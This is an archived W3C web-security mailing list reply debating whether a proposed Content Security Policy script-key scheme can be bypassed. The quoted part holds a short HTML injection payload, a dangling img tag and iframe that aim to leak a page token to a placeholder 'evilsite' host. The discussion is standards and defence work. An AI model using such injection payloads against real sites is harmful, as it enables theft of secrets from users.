W3C home > Mailing lists > Public > public-web-security@w3.org > January 2011

Re: [Content Security Policy] Proposal to move the debate forward

From: Gervase Markham <gerv@mozilla.org>
Date: Fri, 28 Jan 2011 11:04:10 +0000
Message-ID: <4D42A2AA.3030908@mozilla.org>
To: gaz Heyes <gazheyes@gmail.com>
CC: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
On 28/01/11 10:54, gaz Heyes wrote:
> You want a automatic attack? Ok. I'm really clueless as to why you don't
> get this. I said there are many ways. <img src='//evilsite?token please=
> Initiated by a <iframe src="//cspsite?injection=<img
> src='//evilsite?token please=" onload="setTimeout(function(){
> readKey();doJSInjection(); }, 10000)"></iframe>

Still don't get it, sorry :-( If you inject the <img src= etc. into the 
CSP site using script-key, your onload won't run because it doesn't have 
the script-key in the script text.

You need the key to run any script in the page context. _Any_ script - 
event handlers, in-page, external. Apart from your suggestion of 
managing to get a form submitted with a chunk of page HTML in the form 
data, then you need script to get the key. Catch 22.

Gerv
Received on Friday, 28 January 2011 11:04:49 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Friday, 28 January 2011 11:04:49 GMT